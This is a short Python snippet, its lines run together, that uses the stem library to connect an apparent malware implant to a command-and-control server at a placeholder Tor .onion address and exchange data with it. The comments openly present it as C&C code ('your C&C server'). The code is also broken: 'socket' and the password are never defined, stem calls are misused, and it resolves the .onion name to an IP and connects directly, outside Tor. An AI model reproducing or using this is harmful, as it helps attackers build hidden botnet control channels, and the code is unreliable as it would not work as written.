import stem import stem.connection import stem.util.system # Replace with the address of your C&C server cc_server = "xyzabc123.onion" # Connect to the Tor control port control_socket = stem.socket.ControlPort(port = 9051) # Authenticate with the Tor control port stem.connection.authenticate_password(control_socket, control_password) # Start a new circuit to the C&C server circuit_id = stem.control.Controller.from_port(port = 9051).new_circuit(path = [], await_build = True) # Resolve the C&C server's address cc_server_ip = stem.util.connection.resolve_address(cc_server) # Connect to the C&C server cc_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) cc_socket.connect((cc_server_ip, 80)) # Send data to the C&C server cc_socket.sendall(b"hello") # Receive data from the C&C server data = cc_socket.recv(1024)